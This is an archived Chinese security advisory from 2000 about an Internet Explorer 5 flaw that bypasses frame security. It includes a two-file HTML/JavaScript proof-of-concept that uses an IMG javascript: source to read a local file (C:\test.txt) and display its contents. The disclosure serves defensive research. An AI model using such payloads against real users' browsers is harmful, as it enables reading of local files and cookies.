首页 -> 安全研究

安全研究

安全漏洞
IE 5绕过'多帧安全机制'漏洞

发布日期:2000-01-11
更新日期:2000-01-11

受影响系统:
Internet Explorer 5.01 under Windows 95
Internet Explorer 5.5 under Windows NT 4.0
描述:

Win95和NT下的IE 5存在一个安全漏洞,可能导致'多帧安全机制'被绕过.这中安全机制通常
用来阻止外部站点通过打开一个包含本地的数据的隐藏帧来获取敏感信息(包括硬盘文件或
者Intranet页面等等).在这种机制下,可以打开另外一个帧,但外部站点不能从中读取数据.
但IE的一个安全漏洞使得恶意站点可以绕过这种机制,读取本地数据.

细节:

通过用<IMG SRC="javascript:...">语句来访问正在使用的"旧"文档的DOM(磁盘操作监视程序),
就可以绕过这种安全机制.这将允许读取本地文件,或从本地网络的其他主机上读取文件,读取
cookie等等.

如果你在IE5的一个窗口中打开一个包含旧文档的新文档,那么在新文档被完全打开和解释之前,
可以通过在新文档中插入<IMG SRC="javascript:...">语句访问旧文档的DOM.

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

-----------------img2main.html---------------------------------------
<A HREF="img2.html" TARGET="victim">link</A>
<SCRIPT>
alert("Create a short text file C:\\test.txt and it will be read and shown
in a message box");
a=window.open("file://c:/test.txt","victim");
setTimeout("document.links[0].click()",2000);
</SCRIPT>
---------------------------------------------------------------------

----------------img2.html--------------------------------------------
<HTML>
<IMG SRC="javascript:a=window.open('javascript:alert(\'Here is your file:  
\'+opener.document.body.innerText)');alert('Just an alert, but is
necessary. Wait a little.')">
</HTML>
---------------------------------------------------------------------




建议:
禁止javascript

浏览次数:6825
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障